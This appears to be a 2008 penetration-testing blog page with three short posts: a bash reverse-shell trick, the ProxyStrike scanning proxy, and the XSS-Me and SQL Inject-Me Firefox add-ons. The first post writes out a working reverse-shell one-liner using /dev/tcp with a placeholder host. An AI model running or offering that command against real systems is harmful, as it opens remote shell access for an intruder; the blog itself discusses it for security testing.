April 17, 2008
Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell. Used to be you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.
All you need is:
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
and tadaa, reverse shell.
Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
Kevin Riggins
1 Comment | 
Security testing, Web App Testing, red team | Tagged: pen testing, reverse shell, Web App Testing | 
Permalink
Posted by Kevin Riggins
April 8, 2008
The folks over at Darknet do a great job of pointing out interesting tools for use in penetration testing and web app security testing among other things. I won’t be duplicating their feed here, but when I see something that I want to test for myself, I will be posting about it.
One such tool that I have been playing with a little over the couple of days is Edge-Security - ProxyStrike v1.0. from their site:
The process is very simple, ProxyStrike runs like a passive proxy listening in port 8008 by default, so you have to browse the desired web site setting your browser to use ProxyStrike as a proxy, and ProxyStrike will analyze all the paremeters in background mode. For the user is a passive proxy because you won’t see any different in the behaviour of the application, but in the background is very active. 
Nifty, I don’t have to do anything, but browse about and rack up the vulnerability counts Well, it is not quite that easy, but works quite well in the limited testing I have done using DVL. I will be playing with it more and will report back what I find.
No Comments » | Web App Testing | Permalink
Posted by Kevin Riggins
March 30, 2008
Sometimes it is nice to have a quick tool that will scan a site for basic XSS or SQL Injection vulnerabilities. It is even nicer if you don’t have to go through some long drawn out setup procedure just to see if a field has any tasty morsels to chew on. Enter a free suite of tools call Exploit-Me by
Security Compass - Application Security.
The suite currently consists of two tools:
- XSS-Me - a tool to test for Cross-Site Scripting vulnerablities
- SQL Inject-Me - a tool to test for SQL Injection vulnerabilitie
The beauty of the Exploit-Me suite is the tools are Firefox add-ons and don’t require a proxy.Install the add-on and when you are on a page you want to test, just open the sidebar and go to town.
Take a peek. I think you’ll like them.
-Kevin Riggins
1 Comment | Web App Testing | Permalink
Posted by Kevin Riggins
